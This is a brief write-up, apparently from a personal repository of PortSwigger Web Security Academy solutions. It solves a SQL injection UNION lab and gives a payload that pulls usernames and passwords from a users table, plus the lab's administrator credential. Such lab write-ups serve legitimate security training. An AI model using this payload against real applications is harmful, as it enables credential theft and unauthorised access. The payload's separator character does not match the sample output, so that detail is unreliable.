hoangpham2209/PortSwigger-Web-Security/SQL Injection/Using a SQL injection UNION attack to retrieve interesting data/README.md

 Now exploit the payload: `' UNION SELECT NULL, username || '`' || password FROM users--`

+It will show you the username and password like this: `administrator~c33dy80c5hdjybojdbzf`, use it to log in and we done.

 **Source:** [Lab: SQL injection UNION attack, retrieving data from other tables](https://portswigger.net/web-security/learning-paths/sql-injection/sql-injection-using-a-sql-injection-union-attack-to-retrieve-interesting-data/sql-injection/union-attacks/lab-retrieve-data-from-other-tables)